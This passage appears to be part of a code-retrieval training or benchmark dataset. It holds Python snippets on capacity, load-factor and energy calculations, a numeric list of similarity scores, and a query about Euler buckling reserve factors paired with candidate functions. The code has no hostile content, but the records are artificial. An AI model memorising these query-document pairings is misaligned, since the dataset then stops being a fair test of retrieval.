self.measruements)\n return float(sum(normCPUCapacities)) / float(len(normCPUCapacities)) if normCPUCapacities else -1", "def cargo_used(self) -> Union[float, int]:\n return self.proto.cargo_space_taken", "def CalculateProcessingCapacity(self, problemManager, mineDataManager):\n \n self.oreProcessed = np.zeros(len(mineDataManager.theMiningSystem.oreMined)) \n self.processingPower = np.zeros(len(mineDataManager.theMiningSystem.oreMined)) \n self.processingCapacity = mineDataManager.theMiningSystem.mineOreProductionCapacity # ore is processed at a constant rate\n carryOver = 0.0\n for year in range( len(mineDataManager.theMiningSystem.oreMined )-1 ):\n processedOre = carryOver + mineDataManager.theMiningSystem.oreMined[year]\n \n if(processedOre > self.processingCapacity):\n carryOver = processedOre - self.processingCapacity\n processedOre = self.processingCapacity\n else:\n carryOver = 0.0\n self.oreProcessed[year] = processedOre\n \n self.oreProcessed[-1] = carryOver + mineDataManager.theMiningSystem.oreMined[-1] # final year\n \n \n # convert tonnes processed each year to the number of Mwh based on powerlaw fit\n self.processingPower = 3.96*(self.oreProcessed )**0.703 # in Mwh\n \n referenceMetalStr = mineDataManager.theOreBody.type[:2] \n # first two letters of orebody type is assumed to be reference metal for determining processing grade\n # eg AuCu -> gold is reference metal - note that user must select correct method\n \n \n referenceMetalOreConcentration = mineDataManager.theOreBody.metalGrades[referenceMetalStr]\n\n self.concentrateMetalConcentration = 1.0\n \n # lookup concentrateMetalConcentrations based on reference metal type\n \n concentrateConcentrations = {\"Au\":0.75,\"Ag\":0.85,\"Ni\":0.1,\"Cu\":0.25,\"Pb\":0.5}\n \n # find the minimum amount of concentration needed to bring concentrate to market\n minConcentrationFactor = 1e64\n \n for metal,metalOreGrade in mineDataManager.theOreBody.metalGrades.iteritems():\n if metal in concentrateConcentrations:\n concentrateGrade = concentrateConcentrations[metal]\n concFactor = concentrateGrade/(metalOreGrade/(1.0+ mineDataManager.theMiningSystem.dilution) +1e-64)\n if concFactor < 1.0:\n concFactor = 1.0\n #print \"concFactor\", metal, concFactor, metalOreGrade, concentrateGrade\n if(concFactor < minConcentrationFactor ):\n minConcentrationFactor = concFactor\n self.concentrateMetalConcentration = concentrateGrade\n \n # concentrate is calculated based on estimate of mineral content\n self.concentrateProduced = (1.0 - self.processingLoss) \\\n *np.array(mineDataManager.theMiningSystem.oreMined)/minConcentrationFactor \n \n \n return self.processingCapacity", "def test_carriers_reserve_margin_constraint(self):\n m = build_model(\n {\"model.reserve_margin.electricity\": 0.01},\n \"simple_supply,two_hours,investment_costs\",\n )\n m.run(build_only=True)\n assert hasattr(m._backend_model, \"reserve_margin_constraint\")", "def kilometres_available(self):\n return self.fuel / self.litres_per_kilometre", "def get_excess(self) -> int:\n excess_to_min_treasury = self._treasury_balance.get() - self._treasury_min.get()\n auth_score = self.create_interface_score(self._game_auth_score.get(), AuthInterface)\n if not self._excess_smoothing_live.get():\n return excess_to_min_treasury - auth_score.get_excess()\n else:\n third_party_games_excess: int = 0\n games_excess = auth_score.get_todays_games_excess()\n for game in games_excess:\n third_party_games_excess += max(0, int(games_excess[game]))\n reward_pool = excess_to_min_treasury - third_party_games_excess * 20 // 100\n return reward_pool", "def calc_generation_wind_proposed (self):\n if self.comp_specs['proposed capacity'] != UNKNOWN:\n self.load_offset_proposed = \\\n self.comp_specs['proposed capacity']\n self.generation_wind_proposed = \\\n self.comp_specs['proposed generation']\n\n if self.generation_wind_proposed == UNKNOWN:\n self.generation_wind_proposed = self.load_offset_proposed *\\\n float(self.comp_specs\\\n ['capacity factor'])*\\\n constants.hours_per_year\n\n return\n\n self.load_offset_proposed = 0\n\n offset = self.average_load*\\\n (self.comp_specs['percent generation to offset'] / 100.0)\n #~ print self.forecast.generation['generation hydro'].sum()\n\n # removed on purpose\n #~ hydro = \\\n #~ self.forecast.generation['generation hydro'].fillna(0).sum()\n #~ if hydro > 0:\n #~ offset *= 2\n\n # existing very variable RE\n existing_RE = \\\n int(float(self.cd['wind capacity'])) + \\\n int(float(self.cd['solar capacity']))\n\n if existing_RE < (round(offset/25) * 25): # ???\n #~ print \"True\"\n self.load_offset_proposed = round(offset/25) * 25 - existing_RE\n\n\n\n # not needed for now\n #~ self.total_wind_generation = self.generation_load_proposed + \\\n #~ int(self.comp_specs['wind capacity'])\n\n self.generation_wind_proposed = self.load_offset_proposed * \\\n float(self.comp_specs['capacity factor'])*\\\n constants.hours_per_year\n #~ print 'self.load_offset_proposed',self.load_offset_proposed\n #~ print 'self.generation_wind_proposed',self.generation_wind_proposed", "def new_capacity_rule(mod, prj, prd):\n return 0", "def CalcEffectiveInventory(self):\r\n return (self.currentStock - self.currentOrders)", "def penaltyFactor(m):\n \"\"\" m in GeV \"\"\"\n if m*m>0.71:\n return math.pow(m*m/0.71,-4)\n else:\n return 1", "def recommend_contract(meter_load, percentile=100.0):\n\n load_value = np.nanpercentile(meter_load[meter_load != 0], percentile)\n\n for contract in contracts_available:\n if load_value < contract:\n return contract/kW\n\n return contracts_available[-1]/kW", "def calculate_available_node_res (self, vnfs_to_be_left_in_place={},\n mode=MODE_ADD):\n # add available res attribute to all Infras and subtract the running\n # NFs` resources from the given max res\n for n in self.infras:\n setattr(self.network.node[n.id], 'availres',\n copy.deepcopy(self.network.node[n.id].resources))\n if mode == self.MODE_ADD:\n for vnf in self.running_nfs(n.id):\n # if a VNF needs to be left in place, then it is still mapped by the \n # mapping process, but with placement criteria, so its resource \n # requirements will be subtracted during the greedy process.\n if vnf.id not in vnfs_to_be_left_in_place:\n try:\n newres = self.network.node[n.id].availres.subtractNodeRes(\n self.network.node[vnf.id].resources,\n self.network.node[n.id].resources)\n except RuntimeError:\n raise RuntimeError(\n \"Infra node`s resources are expected to represent its maximal \"\n \"capabilities.\"\n \"The NodeNF(s) running on Infra node %s, use(s)more resource \"\n \"than the maximal.\" % n.id)\n else:\n try:\n newres = self.network.node[n.id].availres.subtractNodeRes(\n vnfs_to_be_left_in_place[vnf.id].resources,\n self.network.node[n.id].resources)\n except RuntimeError:\n raise RuntimeError(\"VNF %s cannot be kept on host %s with \"\n \"increased resource requirements due to not \"\n \"enough available resources!\" % (vnf.id, n.id))\n\n self.network.node[n.id].availres = newres", "def getResidualCapacity(self, edge):\r\n return self.getCapacity(edge) - self.getFlow(edge)", "def available_capacity(self):\r\n return self.capacity - len(self.passengers)", "def _handle_icx_get_total_supply(self,\n context: 'IconScoreContext',\n params: dict) -> int:\n return self._icx_engine.get_total_supply(context)", "def _estimate_elasticsearch_requirement(\n instance: Instance,\n desires: CapacityDesires,\n working_set: float,\n reads_per_second: float,\n max_rps_to_disk: int,\n zones_per_region: int = 3,\n copies_per_region: int = 3,\n) -> CapacityRequirement:\n # Keep half of the cores free for background work (merging mostly)\n needed_cores = math.ceil(sqrt_staffed_cores(desires) * 1.5)\n # Keep half of the bandwidth available for backup\n needed_network_mbps = simple_network_mbps(desires) * 2\n\n needed_disk = math.ceil(\n (1.0 / desires.data_shape.estimated_compression_ratio.mid)\n * desires.data_shape.estimated_state_size_gib.mid\n * copies_per_region,\n )\n\n # Rough estimate of how many instances we would need just for the the CPU\n # Note that this is a lower bound, we might end up with more.\n needed_cores = math.ceil(\n max(1, needed_cores // (instance.cpu_ghz / desires.core_reference_ghz))\n )\n rough_count = math.ceil(needed_cores / instance.cpu)\n\n # Generally speaking we want fewer than some number of reads per second\n # hitting disk per instance. If we don't have many reads we don't need to\n # hold much data in memory.\n instance_rps = max(1, reads_per_second // rough_count)\n disk_rps = instance_rps * _es_io_per_read(max(1, needed_disk // rough_count))\n rps_working_set = min(1.0, disk_rps / max_rps_to_disk)\n\n # If disk RPS will be smaller than our target because there are no\n # reads, we don't need to hold as much data in memory\n needed_memory = min(working_set, rps_working_set) * needed_disk\n\n # Now convert to per zone\n needed_cores = needed_cores // zones_per_region\n needed_disk = needed_disk // zones_per_region\n needed_memory = int(needed_memory // zones_per_region)\n logger.debug(\n \"Need (cpu, mem, disk, working) = (%s, %s, %s, %f)\",\n needed_cores,\n needed_memory,\n needed_disk,\n working_set,\n )\n\n return CapacityRequirement(\n requirement_type=\"elasticsearch-data-zonal\",\n core_reference_ghz=desires.core_reference_ghz,\n cpu_cores=certain_int(needed_cores),\n mem_gib=certain_float(needed_memory),\n disk_gib=certain_float(needed_disk),\n network_mbps=certain_float(needed_network_mbps),\n context={\n \"working_set\": min(working_set, rps_working_set),\n \"rps_working_set\": rps_working_set,\n \"disk_slo_working_set\": working_set,\n \"replication_factor\": copies_per_region,\n \"compression_ratio\": round(\n 1.0 / desires.data_shape.estimated_compression_ratio.mid, 2\n ),\n \"read_per_second\": reads_per_second,\n },\n )", "def new_capacity_rule(mod, g, p):\n return 0", "def get_occupant_room_load_for_cooling_balanced(\n l_cs: np.ndarray, l_cl: np.ndarray, q_d_trs_prt: np.ndarray) -> (np.ndarray, np.ndarray):\n\n l_d_cs = np.where(l_cs[0:5] > 0.0, l_cs[0:5] - q_d_trs_prt, 0.0)\n l_d_cl = l_cl[0:5]\n\n return np.clip(l_d_cs, 0.0, None), np.clip(l_d_cl, 0.0, None)", "def calculate_lower_boundary(self, divisor):\n\n # see how low you can go\n quotas = [0] * self.states\n fair_shares = [0] * self.states\n counter = 0\n lowest_divisor = 0\n prev_divisor = 0\n estimator = 1000000000\n while counter < 1000:\n for i, population in enumerate(self.populations):\n if divisor is None or population is None:\n return None\n quotas[i] = population / divisor\n fair_shares[i] = math.floor(quotas[i])\n if sum(fair_shares) != self.num_seats:\n estimator = estimator / 10\n prev_divisor = divisor\n divisor = lowest_divisor - estimator\n else:\n lowest_divisor = divisor\n divisor = prev_divisor - estimator\n if lowest_divisor == divisor:\n break\n counter += 1\n return math.ceil(lowest_divisor * 1000) / 1000", "def _check_capacity_limit(self, res, amt, balance, meta, raven_vars, dispatch, t):\n cap = self.get_capacity(meta, raven_vars, dispatch, t)[0][self._capacity_var]\n try:\n if abs(balance[self._capacity_var]) > abs(cap):\n #ttttt\n # do the inverse problem: how much can we make?\n balance, meta = self.produce_max(meta, raven_vars, dispatch, t)\n print('The full requested amount ({res}: {req}) was not possible, so accessing maximum available instead ({res}: {blc}).'.format(res=res, req=amt, blc=balance[res]))\n except KeyError:\n raise SyntaxError('Resource \"{}\" is listed as capacity limiter, but not an output of the component! Got: {}'.format(self._capacity_var, balance))\n return balance, meta", "def calculateSaleReturnSolidity(S, R, F, T):\n _supply = uint256(S)\n _reserveBalance = uint256(R)\n _reserveRatio = uint256(F)\n _sellAmount = uint256(T)\n \n if ( _supply < _sellAmount):\n raise Exception(\"Supply < Tokens\")\n\n _baseN = _supply - _sellAmount\n\n\n if _reserveRatio == 100:\n amount = uint256(_reserveBalance * _baseN ) / _supply\n if _reserveBalance < amount:\n raise Exception(\"_reservebalance < amount\")\n\n return _reserveBalance - amount\n\n resD = FIXED_ONE\n #resN = power_sale(_supply, _baseN, 100, _reserveRatio)\n resN = power(_supply, _baseN, 100, _reserveRatio)\n resN = uint256(resN)\n\n reserveUpshifted = uint256(_reserveBalance * resN)\n amount = uint256(_reserveBalance * resD) \n\n \n result = (reserveUpshifted - amount) / resN\n \n if verbose:\n print(\" rbal[%d] * resN[%d] / resD[%d] - rbal[%d] = %d \" %\n (_reserveBalance, resN, resD, _reserveBalance, result))\n\n return uint256(result - minUnit(R))", "def load_factor(self) -> float:\n return self.filled_count / self.table_size", "def _cost_caught_by_police(self):\n if self.fine_frequency != 0:\n if self.number_of_courses % self.fine_frequency == 0 and self.number_of_courses != 0:\n if self.number_of_courses % self.fine_frequency_paid_by_driver == 0 and self.number_of_courses != 0:\n self.fine_paid_number_of_courses += 1\n fine_value = np.random.choice([100, 200, 500], p=[0.25, 0.4, 0.35])\n self.total_penalty_points += self._add_penalty_points() # adding penalty points\n return fine_value\n else:\n return 0\n else:\n return 0\n else:\n return 0", "def trucks_required(self) -> int:\n daily_demand = (\n self.total_demand() / self.operations.productivity.working_days_per_year\n )\n trucks_required = np.ceil(\n daily_demand\n / (self.operations.avg_vol_per_lift() * self.inputs.lifts_per_truck_day)\n )\n return trucks_required", "def get_utilization(self, node: int) -> float:\n return self.busy[node].pmf(1)", "def calc(self, demands: Demand, routing: Routing) -> np.ndarray:\n total_utilisation = np.zeros((self.num_nodes, self.num_nodes),\n dtype=float)\n\n for commodity_idx in range(len(self.commodities)):\n utilisation = self.calc_demand(routing,\n demands[commodity_idx],\n commodity_idx)\n total_utilisation += utilisation\n\n return np.max(np.divide(total_utilisation, self.edge_capacities))", "def calc_pre_intertie_generation (self):\n\n self.pre_intertie_generation = \\\n self.forecast.get_generation(self.start_year,self.end_year)\n\n gen_eff = self.cd[\"diesel generation efficiency\"]\n self.pre_intertie_generation_fuel_used = \\\n self.pre_intertie_generation / gen_eff\n\n #~ print 'self.baseline_generatio',self.baseline_generation", "def _cost(self, action):\n return float(self.spacecraft.crashed)", "def calc_DC_supply(t_0, t_1):\n if t_0 == 0:\n t_0 = 1E6\n if t_1 > 0:\n tmin = min(t_0, t_1)\n else:\n tmin = t_0\n return tmin", "def calc_electric_diesel_reduction (self):\n gen_eff = self.cd[\"diesel generation efficiency\"]\n\n self.electric_diesel_reduction = self.net_generation_wind / gen_eff\n\n electric_diesel = self.generation/gen_eff\n if self.electric_diesel_reduction > electric_diesel:\n self.electric_diesel_reduction = electric_diesel", "def calc_annual_electric_savings (self):\n costs = self.comp_specs['diesel generator o&m']\n\n for kW in costs.keys():\n try:\n if self.average_load < int(kW):\n maintenance = self.comp_specs['diesel generator o&m'][kW]\n break\n except ValueError:\n maintenance = self.comp_specs['diesel generator o&m'][kW]\n\n self.baseline_generation_cost = maintenance + \\\n (self.pre_intertie_generation_fuel_used * self.diesel_prices)\n\n maintenance = self.capital_costs * \\\n (self.comp_specs['percent o&m'] / 100.0)\n self.proposed_generation_cost = maintenance + \\\n self.intertie_offset_generation_fuel_used * \\\n self.intertie_diesel_prices\n self.annual_electric_savings = self.baseline_generation_cost -\\\n self.proposed_generation_cost\n #~ print len(self.annual_electric_savings)\n #~ print 'self.annual_electric_savings',self.annual_electric_savings", "def get_load_factor(self):\r\n return self.num_items / self.table_size", "def inventoryCapacity(self):\n # TODO: Worry about how +Strength and +Capacity gear could allow you to carry more than your capacity.\n if self.totalStrength <= 15:\n return int(6 * self.totalStrength + self._baseInventoryCapacity + self._equipmentCarryingCapacity)\n else:\n return int(90 + (self.totalStrength - 15) * 9 + self._baseInventoryCapacity + self._equipmentCarryingCapacity)", "def diff_l_sum_avail():\n def subtract(raster1, raster2):\n \"\"\"Subtract raster2 from raster1.\"\"\"\n valid_mask = (\n (raster1 != nodata) &\n (raster2 != nodata))\n result = numpy.empty(raster1.shape, dtype=numpy.float32)\n result[:] = nodata\n result[valid_mask] = raster1[valid_mask] - raster2[valid_mask]\n return result\n\n outer_results_dir = r\"C:\\Users\\ginge\\Dropbox\\NatCap_backup\\USFS\\model_runs\\precip_scenarios\"\n example_raster = r\"C:\\Users\\ginge\\Dropbox\\NatCap_backup\\USFS\\model_runs\\precip_scenarios\\0.5x\\post_decline\\L_sum_avail.tif\"\n nodata = pygeoprocessing.get_raster_info(example_raster)['nodata'][0]\n for multiply_factor in [0.5, 0.7, 0.9, 1.1, 1.3, 1.5]:\n results_dir = os.path.join(\n outer_results_dir, '{}x'.format(multiply_factor))\n predecline_lavail_sum = os.path.join(\n results_dir, 'pre_decline', 'L_sum_avail.tif')\n postdecline_lavail_sum = os.path.join(\n results_dir, 'post_decline', 'L_sum_avail.tif')\n target_path = os.path.join(\n results_dir, \"L_sum_avail_post_minus_pre.tif\")\n pygeoprocessing.raster_calculator(\n [(postdecline_lavail_sum, 1), (predecline_lavail_sum, 1)],\n subtract, target_path, gdal.GDT_Float32, nodata)", "def get_total_supply() -> int:\n return total_supply" ]
[ "0.5882945", "0.5823634", "0.57726854", "0.57467616", "0.5741599", "0.57414633", "0.5710871", "0.55506474", "0.54651403", "0.5430573", "0.5428441", "0.54128045", "0.53944397", "0.5361302", "0.535642", "0.53394634", "0.5322019", "0.53197694", "0.5309506", "0.5301232", "0.530022", "0.52987295", "0.52906734", "0.5287092", "0.52850485", "0.52696913", "0.52629864", "0.5246036", "0.52322215", "0.5228011", "0.5210022", "0.51905465", "0.518204", "0.5169943", "0.51448846", "0.51427823", "0.5116554", "0.511279", "0.5110827", "0.51092273", "0.510617", "0.50925726", "0.5086132", "0.508438", "0.5083437", "0.5081476", "0.50776327", "0.5075482", "0.5049715", "0.5046699", "0.50456583", "0.5042509", "0.5033329", "0.50328594", "0.503198", "0.5025129", "0.50105274", "0.5004199", "0.4996772", "0.49952048", "0.49876794", "0.49860978", "0.49860513", "0.49811885", "0.49804294", "0.497636", "0.4974732", "0.49664733", "0.49632525", "0.49581733", "0.49543062", "0.49542627", "0.4953676", "0.49495435", "0.49447113", "0.49438116", "0.49423724", "0.4937921", "0.49325305", "0.49250734", "0.4923298", "0.4921956", "0.4918844", "0.4917521", "0.4917422", "0.49152955", "0.49150658", "0.49057668", "0.48993322", "0.4898713", "0.4898488", "0.48982564", "0.48913914", "0.48863244", "0.4885471", "0.4884318", "0.48762396", "0.48742464", "0.48735347", "0.48719868" ]
0.517416
33
Calculate the reserve factor for Euler Buckling Failure by calculating the critical load and comparing to the applied load. Return the reserve factor adjusted for inequalities based around =>0
def eulerBuckle(dim): bst = dim[0] tst = dim[1] tsk = dim[2] ZEAZ = (Est*bst*tst*((tsk/2)+(bst/2))) ZEA = (Est*bst*tst)+(Esk*tsk*bsk) zbar = ZEAZ/ZEA # Neutral Axis EIbar = ((Esk*bsk*(tsk**3))/12)+(Esk*bsk*tsk*(zbar**2))+((Est*tst*bst**3)/12)+\ (Est*bst*tst*(((bst/2)+(tsk/2)-zbar)**2)) # Using Parallel Axis Theorm NxEuler = ((math.pi**2)*EIbar)/(ribSpace**2*bsk) # Critical Load rsf = NxEuler/Nx return rsf - 1.1 # Using a target Reserve Factor of >=1.1
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_load_factor(self):\n # Your code here\n return self.total_items / self.capacity", "def internal_external_canopy_heat_capacity(lumped_cover_heat_capacity: float) -> float:\n return 0.1 * lumped_cover_heat_capacity", "def calculate_lower_boundary(self, divisor):\n\n # see how low you can go\n quotas = [0] * self.states\n fair_shares = [0] * self.states\n counter = 0\n lowest_divisor = 0\n prev_divisor = 0\n estimator = 1000000000\n while counter < 1000:\n for i, population in enumerate(self.populations):\n if divisor is None or population is None:\n return None\n quotas[i] = population / divisor\n fair_shares[i] = math.floor(quotas[i])\n if sum(fair_shares) != self.num_seats:\n estimator = estimator / 10\n prev_divisor = divisor\n divisor = lowest_divisor - estimator\n else:\n lowest_divisor = divisor\n divisor = prev_divisor - estimator\n if lowest_divisor == divisor:\n break\n counter += 1\n return math.ceil(lowest_divisor * 1000) / 1000", "def calculate_upper_boundary(self, divisor):\n\n # see how high you can go\n quotas = [0] * self.states\n fair_shares = [0] * self.states\n counter = 0\n highest_divisor = 0\n prev_divisor = 0\n estimator = 1000000000\n while counter < 1000:\n for i, population in enumerate(self.populations):\n if divisor is None:\n return None\n quotas[i] = population / divisor\n fair_shares[i] = math.floor(quotas[i])\n if sum(fair_shares) != self.num_seats:\n estimator = estimator / 10\n prev_divisor = divisor\n divisor = highest_divisor + estimator\n else:\n highest_divisor = divisor\n divisor = prev_divisor + estimator\n if highest_divisor == divisor:\n break\n counter += 1\n return math.floor(highest_divisor * 1000) / 1000", "def get_amount_in(amount_out, reserve_in, reserve_out):\n assert amount_out > 0\n assert reserve_in > 0 and reserve_out > 0\n numerator = reserve_in*amount_out*1000\n denominator = (reserve_out - amount_out)*997\n return float(numerator/denominator + 1)", "def penalty_calc(self):\n self.p_budget = (self.tx_oma_min - self.rx_unstressed_sensitivity - self.fiber_conn_loss)*self.l_1\n\n # fiber attenuation,\n self.p_atten = self.alpha*self.length # column B\n\n # calculate bandwidth for RIN test (exclude transmitter)\n rin_inverse_bw = np.sqrt(np.square(1.0/self.bw_cd) + np.square(1.0/self.bw_md) + (0.477/(self.rx_bw**2))*self.l_1)\n rin_bw = 1.0 / rin_inverse_bw\n\n # see FC-MSQS-2 equation B.47 in Annex B.4 for the following k_rin = math.sqrt(2.0/math.pi)*erfinv(0.8)\n k_rin = 0.7\n\n # v_rin,\n self.v_rin = (k_rin*1E6*(self.rin_test_isi**2)*rin_bw*\n math.pow(10.0,0.1*self.rin)) # column AK\n\n # Prin,\n print('v_rin: ', self.v_rin)\n print('Q: ',self.Q)\n print('isi_dj_refl_closed :', self.isi_dj_refl_closed)\n self.p_rin = -10.0*np.log10(np.sqrt(1.0-np.multiply(self.v_rin, np.square(self.Q/self.isi_dj_refl_closed)))) # column R\n print(\"P_rin : \", self.p_rin)\n self.beta = (3.14159E-6*self.speedup*self.br_nominal *self.delta_lambda*self.d1*self.length) # column O\n self.sigma_mpn = (self.k_mpn/math.sqrt(2.0)*(self.l_1 -np.exp(-np.square(self.beta)))) # column P\n self.p_mpn = (-10.0*np.log10(np.sqrt(self.l_1 - (self.Q**2)*np.square(self.sigma_mpn)))) # column Q\n self.p_blw = (-10.0*math.log10(math.sqrt(1.0- ((self.Q*self.sigma_blw)/ self.isi_tp4_rx)**2))*self.l_1) # cell T13\n self.p_reflection = -10.0*np.log10(self.isi_reflection) # column N\n self.v_mn = (((1.0-math.pow(10.0,-0.2*self.pmn))/ (self.Q)**2)*self.l_1) # cell AG7\n print(\"isi_center : \", self.isi_center)\n\n self.p_isi_center = -10.0*np.log10(self.isi_center) # column J\n\n self.p_isi_corners = (-10.0*np.log10(self.isi_corners) - self.p_isi_center) # column K\n self.p_isi_dj_center = (-10.0*np.log10(self.isi_dj_refl_closed) - self.p_isi_center) # column L\n self.p_isi_dj_corners = (-10.0*np.log10(self.isi_dj_corners) -self.p_isi_center -self.p_isi_corners) # column M\n\n\n # calculate the \"cross\" penalty contribution, column S\n arg1 = ((self.sigma_blw**2 + self.v_rin)/ np.square(self.isi_dj_refl_closed))\n arg2 = self.l_1 - (self.Q**2)*(arg1 + self.v_mn + np.square(self.sigma_mpn))\n arg3 = (-10.0*np.log10(np.multiply(self.isi_dj_refl_closed, np.sqrt(arg2))))\n self.p_cross_center = ( # column S\n arg3\n - self.p_blw # cell T13\n - self.p_isi_center # column J\n - self.p_isi_dj_center # column L\n - self.p_mpn # column Q\n - self.p_reflection # column N\n - self.p_rin # column R\n - self.pmn*self.l_1) # cell G13\n print('p_isi_center: ', self.p_isi_center)\n\n # calculate the total power budget evaluated at the center of the eye\n self.p_total_center = ( # column T\n self.p_isi_center # column J\n + self.p_isi_dj_center # column L\n + self.p_atten # column B\n + self.p_mpn # column Q\n + self.p_reflection # column N\n + self.p_rin # column R\n + self.p_cross_center # column S\n + self.pmn*self.l_1) # cell G13\n # calculate the total power budget evaluated at the corner of the eye\n self.p_total_corners = (\n self.p_isi_center # column J\n + self.p_isi_corners # column K\n + self.p_atten # column B\n + self.p_mpn # column Q\n + self.p_reflection # column N\n + self.p_rin # column R\n + self.p_cross_center # column S\n + self.pmn*self.l_1 # cell G13\n + self.p_isi_dj_corners)# column M\n\n # receiver stressed sensitivity\n self.margin = ( self.p_budget\n - self.p_total_center) # column W\n\n self.rx_stressed_sensitivity = (\n self.tx_oma_min*self.l_1\n - self.chil\n - self.p_mpn\n - self.p_reflection\n - self.p_rin\n - 0.5*self.p_cross_center\n - self.pmn*self.l_1\n - self.margin[self.lnum//2]*self.l_1)\n\n\n # end of GbE10.penalty_calc\n #======================================================================+", "def ComputeRegenerativeBraking(self):\r\n pass", "def _load_factor(self):\n return self.size / len(self.buckets)", "def calculate_large_constant(self, bound, real_reduction_iterations):#factor):\n minimum_exponent = round(90/(real_reduction_iterations-1))#math.ceil(math.log(bound, 10) * factor)\n \n return ZZ(10 ** minimum_exponent)", "def upper_bound(stock):\n counter=0\n for i in stock_price(stock):\n if i >= resistance(stock):\n counter+=1\n return counter", "def get_additional_ball_capacity(self):\n return 999", "def test_capacity_factor(pudl_out_eia):\n print(\"\\nCalculating generator capacity factors...\")\n cf = pudl_out_eia.capacity_factor()\n print(f\" capacity_factor: {len(cf)} records\")", "def required_points(self):\n req_points = self.min_performance * self.initial_available_points()\n return np.maximum(0, np.int64(np.ceil(req_points)))", "def calc_low_energy_bulb_ratio(lighting_outlets_total, lighting_outlets_low_energy):\n return int(100 * float(lighting_outlets_low_energy) / lighting_outlets_total + 0.5) / 100.0", "def get_fuel_total_saved (self):\n #~ print self.lost_heat_recovery\n #~ print self.intertie_offset_generation_fuel_used\n #~ print self.pre_intertie_generation_fuel_used\n #~ gen_eff = self.cd[\"diesel generation efficiency\"]\n #~ fuel_used = self.intertie_offset_generation / gen_eff\n\n generation_diesel_reduction = \\\n np.array(self.pre_intertie_generation_fuel_used\\\n [:self.actual_project_life])\n return - np.array(self.lost_heat_recovery[:self.actual_project_life]) +\\\n generation_diesel_reduction", "def get_additional_ball_capacity(cls):\n return 999", "def load_factor_d_non_peak(self, data):\n lf_d = np.zeros((data['nr_of_fueltypes']))\n\n # Iterate fueltypes to calculate load factors for each fueltype\n for k, fueldata in enumerate(self.rs_fuels_tot_enduses_d):\n\n average_demand = sum(fueldata) / 365 # Averae_demand = yearly demand / nr of days\n max_demand_d = max(fueldata)\n\n if max_demand_d != 0:\n lf_d[k] = average_demand / max_demand_d # Calculate load factor\n\n lf_d = lf_d * 100 # Convert load factor to %\n\n return lf_d", "def test_efficiency(self):\n effs = self.gr.calculate_global_efficiencies()\n ans = [a/6 for a in [1.5, 2., 1.5]]\n self.assertListEqual(effs.values(), ans)\n\n E = self.gr.global_efficiency()\n self.assertEqual(E, sum(ans))\n\n v_min = (E - (1/3)) / E\n mx, v = self.gr.vulnerability()\n # the middle node (2) is the most vulnerable\n self.assertEqual(mx, (2, v_min))", "def calc_fuel_given_ore(ore, recipes):\n\n upper_bound = None\n lower_bound = 469536 # assume ore needed for 1 fuel is good lower bound\n\n\n while lower_bound + 1 != upper_bound:\n if upper_bound is None:\n guess = lower_bound * 2\n else:\n guess = (upper_bound + lower_bound) // 2\n \n ore_needed = calc_ore_needed(guess, recipes)\n if ore_needed > ore:\n upper_bound = guess\n else:\n lower_bound = guess\n \n return lower_bound", "def _cost_refueling(self):\n if self.number_of_courses % self.refueling_frequency == 0 & self.number_of_courses != 0:\n lowest_amount = self.refueling_liter_range[0] # take a minimum value\n highest_amount = self.refueling_liter_range[1] # take a maximum value\n refueled_petrol = randint(lowest_amount, highest_amount)\n cost = refueled_petrol * self.petrol_cost\n return cost\n else:\n return 0", "def E_BE(self,s,l):\n if s>l: return self.E_BE(l,s)\n if s == 0: return -100\n if l == 0: return -100\n delta = (((s+l)/l)-(l/s)) \n return delta-delta%self._tau", "def load_factor(self) -> float:\n return self.filled_count / self.table_size", "def getRepairCapacity(self):\n return int(self.myDesign.getSYCRequired() * (1-(self.strength/100.0)))", "def get_allowable_fraction_without(mem_to_reserve, cuda_device_index):\n current_free = get_free_gpu_memory(cuda_device_index)\n allowable = current_free - mem_to_reserve # 1GB\n allowable_fraction = allowable / current_free\n if allowable_fraction <= 0.0:\n raise ValueError(f\"Can't leave 1GB over for the inference kernel, because\"\n f\" there is only {allowable} total free GPU memory.\")\n return allowable_fraction", "def standard_init_price(self):\n # If a system can't use something, its price is zero.\n _good = self.tradeitem\n if self.planet.tech_level < _good.tu and _good.name not in 'fuel':\n base_price = 0\n else:\n base_price = _good.plt + (self.planet.tech_level * _good.pi)\n # if good is highly requested, increase the price\n if self.planet.status in [_good.dps]:\n base_price = base_price + (base_price * 0.5)\n # large system: high production decreases prices\n base_price = (base_price * (100 - self.planet.system_size)) / 100\n\n # price can't be negative\n if base_price < 0:\n base_price = 0\n\n return int(base_price)", "def dilutionneeded(self) -> float:\n return self.stock*1.0/self.final", "def MINIMUM_BET() -> int:\n return 10", "def _cost_caught_by_police(self):\n if self.fine_frequency != 0:\n if self.number_of_courses % self.fine_frequency == 0 and self.number_of_courses != 0:\n if self.number_of_courses % self.fine_frequency_paid_by_driver == 0 and self.number_of_courses != 0:\n self.fine_paid_number_of_courses += 1\n fine_value = np.random.choice([100, 200, 500], p=[0.25, 0.4, 0.35])\n self.total_penalty_points += self._add_penalty_points() # adding penalty points\n return fine_value\n else:\n return 0\n else:\n return 0\n else:\n return 0", "def fuel_required(mass):\n return max(math.floor(mass/3) - 2, 0)", "def get_duct_linear_heat_loss_coefficient() -> float:\n return 0.49", "def lower_bound(stock):\n counter=0\n for i in stock_price(stock):\n if i <= support(stock):\n counter+=1\n return counter", "def get_load_factor(self):\r\n return self.num_items / self.table_size", "def penalty(self):\n return 0", "def revenue_landfill(self) -> float:\n return self.income_statement.revenue.operating_revenue * (\n 1 - self.inputs.allocation_to_collection_unit\n )", "def compute_equilibrium(self): \r\n # First compute a valid lower bound for the total flow\r\n totalflow_lb = max(0, np.amax(1 - np.multiply(self.capacity, np.exp(self.beta * np.power(self.capacity, self.theta) + self.phi - self.b))))\r\n if totalflow_lb > 1:\r\n print(\"This network does not have equilibrium!\")\r\n else:\r\n # Compute the total flow at equilibrium z_star\r\n z_star = bisection_search(diff_totalflow_sumflow, totalflow_lb, 1, [1e-10, 1e-10], True, self) \r\n # Compute the flow over each route at equilibrium \r\n for i in range(self.num_routes):\r\n self.flow[i] = bisection_search(zeta, 0, self.capacity[i], [1e-10, 1e-10], True, self, z_star, i, 4)", "def _compute_quantization_factor(self):\n self._quantization_factor = (float(self._full_value_range) /\n self._number_of_intervals)\n logging.debug(\n 'full value range: %r, number of intervals: %r',\n self._full_value_range, self._number_of_intervals)\n logging.debug('quantization factor: %r', self._quantization_factor)", "def overall_reduction(self):\n return 84", "def qty_available(quant) -> float:\n return quant.quantity - quant.reserved_quantity", "def emission_factor(sheets, vehicleClass, 